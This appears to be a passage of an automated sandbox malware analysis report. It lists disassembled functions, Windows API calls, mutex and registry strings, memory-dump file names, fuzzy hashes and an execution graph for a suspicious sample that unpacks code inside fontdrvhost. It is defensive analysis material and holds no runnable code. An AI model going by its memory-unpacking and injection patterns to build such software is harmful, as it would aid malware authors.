                                                                                                                                                                                                                                                                                    • Opcode ID: 41a6657a76e6a11c21828465e7547c488e33e83233d3adc9080a9250c0d0e56d
                                                                                                                                                                                                                                                                                    • Instruction ID: b288529985f008a1a54ef72dbef53761962e394cc992aae83e13a0fae47ca317
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41a6657a76e6a11c21828465e7547c488e33e83233d3adc9080a9250c0d0e56d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40F09CB5254B01AFD324CF55D841F53B7F9AB88B04F104A1DB68A87680D775F814CB55
                                                                                                                                                                                                                                                                                    Function 0045A110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ControlDeviceErrorLast
                                                                                                                                                                                                                                                                                    • String ID: JD
                                                                                                                                                                                                                                                                                    • API String ID: 2645620995-1871045537
                                                                                                                                                                                                                                                                                    • Opcode ID: d7c8a22b5a3b95ab0395684fe2e0b7986e5b4f0bb175450be3ec9314f8fc8b30
                                                                                                                                                                                                                                                                                    • Instruction ID: ad4678ad3c97b32a671b7944ff25921815bdba954f40981503357140da3e9122
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7c8a22b5a3b95ab0395684fe2e0b7986e5b4f0bb175450be3ec9314f8fc8b30
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C501F2B1649300AFD348CF55D891B0BBBE0AFC8700F40992EF68986290E374D949CF86
                                                                                                                                                                                                                                                                                    Function 0041A7E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20registryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RegOpenKeyW.ADVAPI32(?,SYSTEM\CurrentControlSet\services\BootDefrag), ref: 0041A7F7
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32 ref: 0041A811
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A820: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A883
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A820: PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A8F4
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A820: #165.SHELL32(00000000,?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A904
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • SYSTEM\CurrentControlSet\services\BootDefrag, xrefs: 0041A7E5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Path$#165CloseExistsFileFolderOpenSpecial
                                                                                                                                                                                                                                                                                    • String ID: SYSTEM\CurrentControlSet\services\BootDefrag
                                                                                                                                                                                                                                                                                    • API String ID: 1591709053-3464295076
                                                                                                                                                                                                                                                                                    • Opcode ID: b9cba828d4abfd53c5caf4397c6bd50ab3a665ffc0be6c91e1721a714c795c9e
                                                                                                                                                                                                                                                                                    • Instruction ID: 6a09b35f9698f17151a02b8af7ff6770b374517e2ed940df591338b91f7cf978
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9cba828d4abfd53c5caf4397c6bd50ab3a665ffc0be6c91e1721a714c795c9e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02D012B0215200DAE314BBB1DC45B9E33A4EB40315F10492EB45AC1580CB7894998B6A
                                                                                                                                                                                                                                                                                    Function 00401270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateExchangeInterlocked
                                                                                                                                                                                                                                                                                    • String ID: }I
                                                                                                                                                                                                                                                                                    • API String ID: 1770991917-1906338323
                                                                                                                                                                                                                                                                                    • Opcode ID: 6375a689964595e525005095ae3faa2c41de4e6904f8434c51eb6425be86f1fa
                                                                                                                                                                                                                                                                                    • Instruction ID: a163272bfcbb607c39215aeccd5f887c100e22747e7019c329861ded96e1c357
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6375a689964595e525005095ae3faa2c41de4e6904f8434c51eb6425be86f1fa
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64D05E2390012056CA10521ABC48FE6672CAF91360F46427EF80DF71609329A8424AAC
                                                                                                                                                                                                                                                                                    Function 004012A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 004012B2
                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 004012C4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DeleteExchangeInterlocked
                                                                                                                                                                                                                                                                                    • String ID: }I
                                                                                                                                                                                                                                                                                    • API String ID: 1722977832-1906338323
                                                                                                                                                                                                                                                                                    • Opcode ID: 3d9252111c2499e9892cd810a91747644d22c1b39faee1d2a360d963c6ead329
                                                                                                                                                                                                                                                                                    • Instruction ID: 0f44d1f4ef78c4913e9163893a1f1e1819881c729740a469ce0397d160b8c871
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d9252111c2499e9892cd810a91747644d22c1b39faee1d2a360d963c6ead329
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1D05E678000205A9A04521ABC48CE7662CDE9536034A427EFC0DF3160D7299C428AAC
                                                                                                                                                                                                                                                                                    Function 0041A770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18synchronizationCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,{E0A52416-D56A-4c3d-BFC7-3F40E77C718E}), ref: 0041A782
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041A793
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • {E0A52416-D56A-4c3d-BFC7-3F40E77C718E}, xrefs: 0041A779
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                    • String ID: {E0A52416-D56A-4c3d-BFC7-3F40E77C718E}
                                                                                                                                                                                                                                                                                    • API String ID: 1925916568-1835452401
                                                                                                                                                                                                                                                                                    • Opcode ID: 808971c6715f0aa7f10f9f42aa529678d4de9f456662d07aefcc006699d7f1bb
                                                                                                                                                                                                                                                                                    • Instruction ID: f658fb253292798967ff69ee4118aed0b3c4d26085bed42abcbed525fae359d1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 808971c6715f0aa7f10f9f42aa529678d4de9f456662d07aefcc006699d7f1bb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80D05E383003019BEB609B30CC9979A35A0AB40742FE0887EF01FE46C0DA6CD5C48E09
                                                                                                                                                                                                                                                                                    Function 0041A730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18synchronizationCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,{4391F12D-936B-4037-9383-DCB800DF7B65}), ref: 0041A742
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041A753
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • {4391F12D-936B-4037-9383-DCB800DF7B65}, xrefs: 0041A739
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                    • String ID: {4391F12D-936B-4037-9383-DCB800DF7B65}
                                                                                                                                                                                                                                                                                    • API String ID: 1925916568-3123431990
                                                                                                                                                                                                                                                                                    • Opcode ID: 091c4e7f644ce8bd6197cdb533c163e751dc47d35b49d56a391d01d6980858d1
                                                                                                                                                                                                                                                                                    • Instruction ID: ec8680d88669c7631082afe2fce56944a0d96bb555ced3f370f40cb7f6e8cb2a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 091c4e7f644ce8bd6197cdb533c163e751dc47d35b49d56a391d01d6980858d1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D05E343003019BEB646B30CC9539A35A0AB40742FE0887EF01FE46D0EA6CD5D49A09

                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                    Function 032202D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 03220326
                                                                                                                                                                                                                                                                                      • Part of subcall function 032200A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032200CD
                                                                                                                                                                                                                                                                                      • Part of subcall function 032200A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03220279
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 03220378
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 032203E7
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03220407
                                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 0322042E
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 03220456
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 03220471
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001E.00000003.2342953693.0000000003220000.00000040.00000001.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_3_3220000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                                                                                                    • API String ID: 3867569247-3772416878
                                                                                                                                                                                                                                                                                    • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                                                                                                    • Instruction ID: 4c7304c3de5ea7f029943b831f7d4203956b98391d89c7326213943c1045ec46
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98610AB5910219FFDB20DFA5CC84ADEBBB9FF08350F14C51AE959A7240D774A980CB60
                                                                                                                                                                                                                                                                                    Function 032200A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032200CD
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03220279
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001E.00000003.2342953693.0000000003220000.00000040.00000001.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_3_3220000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                                    • Instruction ID: 9d9349a8923e0f6f491ff43766b1a6f201cbf5cb86d7753df3ddcc2bb20695a6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96718D71E1425AEFDB41CF98C981BEDBBF0AF09314F288095E465FB241C274AA91CF65
                                                                                                                                                                                                                                                                                    Function 03220230 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03220279
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001E.00000003.2342953693.0000000003220000.00000040.00000001.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_3_3220000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 72cd1d773d33be3c714891ca11413f6904648207820b321c7b6ca4a788c60533
                                                                                                                                                                                                                                                                                    • Instruction ID: 41ea6d333bd3c3a2d5f58789c23d1c0d1e2ac1afda6266b4c8b58d96b286f022
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72cd1d773d33be3c714891ca11413f6904648207820b321c7b6ca4a788c60533
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09F0A931A2425AEFCB41CF98C981BADBBF1AB14300F248191E455F7250D670EE81CB61

                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                    Execution Coverage:33.4%
                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                    Signature Coverage:83.3%
                                                                                                                                                                                                                                                                                    Total number of Nodes:24
                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                                    execution_graph 415 1795e5a1cf4 417 1795e5a1d19 415->417 416 1795e5a1fa1 417->416 426 1795e5a15c0 417->426 419 1795e5a1f98 CloseHandle 419->416 420 1795e5a1f88 NtAcceptConnectPort 420->419 421 1795e5a1e3a 421->419 421->420 422 1795e5a1ecd 421->422 429 1795e5a0ac8 421->429 422->422 435 1795e5a1aa4 NtAcceptConnectPort 422->435 428 1795e5a15f4 NtAcceptConnectPort 426->428 428->421 430 1795e5a0c62 429->430 431 1795e5a0ae8 429->431 430->422 431->430 432 1795e5a0be8 NtAcceptConnectPort 431->432 432->430 433 1795e5a0c1b 432->433 433->430 434 1795e5a0c33 NtAcceptConnectPort 433->434 434->430 436 1795e5a1c04 435->436 437 1795e5a1af7 435->437 436->420 441 1795e5a1870 437->441 439 1795e5a1b10 440 1795e5a1bb6 NtAcceptConnectPort 439->440 440->436 442 1795e5a1889 441->442 443 1795e5a1930 GetProcessMitigationPolicy 442->443 444 1795e5a1949 442->444 443->444 444->439

                                                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                    Function 000001795E5A1CF4 Relevance: 3.3, APIs: 2, Instructions: 278nativeCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000022.00000002.2564565227.000001795E5A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001795E5A0000, based on PE: false
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1795e5a0000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AcceptCloseConnectHandlePort
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3811980168-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                                                                                                    • Instruction ID: c0533dda654bf3640db349fc0b8b5cfb742a26c3bb8f390fc8dbae61de7448e8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A291C070508F188FDB65EF18C8817E573E1FB88311F54865EE48FCB296EA35A8478B81